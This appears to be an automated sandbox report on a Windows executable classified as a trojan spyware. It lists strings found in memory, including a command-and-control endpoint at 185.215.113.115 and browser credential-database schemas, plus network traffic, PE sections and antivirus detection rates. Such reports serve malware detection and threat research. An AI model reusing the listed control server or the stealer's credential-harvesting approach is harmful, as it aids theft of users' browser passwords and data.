              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phper
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpp
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpve
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115y
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
              Source: chromecache_168.3.dr | String found in binary or memory: http://www.broofa.com
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
              Source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028492455.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_166.3.dr | String found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_166.3.dr | String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_168.3.dr, chromecache_166.3.dr | String found in binary or memory: https://apis.google.com
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_166.3.dr | String found in binary or memory: https://clients6.google.com
              Source: chromecache_166.3.dr | String found in binary or memory: https://content.googleapis.com
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chromecache_166.3.dr | String found in binary or memory: https://domains.google.com/suggest/flow
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_168.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_168.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_168.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_168.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://mozilla.org0/
              Source: chromecache_168.3.dr | String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_166.3.dr | String found in binary or memory: https://plus.google.com
              Source: chromecache_166.3.dr | String found in binary or memory: https://plus.googleapis.com
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://support.mozilla.org
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
              Source: chromecache_166.3.dr | String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_166.3.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_166.3.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chromecache_168.3.dr | String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_168.3.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_168.3.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://www.mozilla.org
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/----JKECGHCFIJDAAKFHJJDHst.exe
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/BAKFCAAKFCFC
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lXy50eHQ=host.exe
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/eads:
              Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2

System Summary

Source: random(1).exe | Static PE information: section name:
Source: random(1).exe | Static PE information: section name: .idata
Source: random(1).exe | Static PE information: section name:
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C6B62C0 PR_dtoa, PR_GetCurrentThread, strlen, NtFlushVirtualMemory, PR_GetCurrentThread, memcpy, memcpy
Source: C:\Users\user\Desktop\random(1).exe | Code function: String function: 6C559B10 appears 97 times
Source: C:\Users\user\Desktop\random(1).exe | Code function: String function: 6C6B09D0 appears 147 times
Source: C:\Users\user\Desktop\random(1).exe | Code function: String function: 6C553620 appears 93 times
Source: C:\Users\user\Desktop\random(1).exe | Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\random(1).exe | Code function: String function: 6C669F30 appears 50 times
Source: random(1).exe, 00000000.00000002.2028991333.000000006F902000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs random(1).exe
Source: random(1).exe, 00000000.00000002.2028835685.000000006C705000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs random(1).exe
Source: random(1).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random(1).exe | Static PE information: Section: fsoqnkix ZLIB complexity 0.995146165615727
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/36@6/7
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C590300 MapViewOfFile, GetLastError, FormatMessageA, PR_LogPrint, GetLastError, PR_SetError
Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OI5WW9ZK.htm
Source: C:\Users\user\Desktop\random(1).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: random(1).exe, random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: random(1).exe, 00000000.00000003.1902604599.0000000005565000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFC.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: random(1).exe | ReversingLabs: Detection: 78%
Source: random(1).exe | Virustotal: Detection: 77%
Source: random(1).exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\random(1).exe "C:\Users\user\Desktop\random(1).exe"
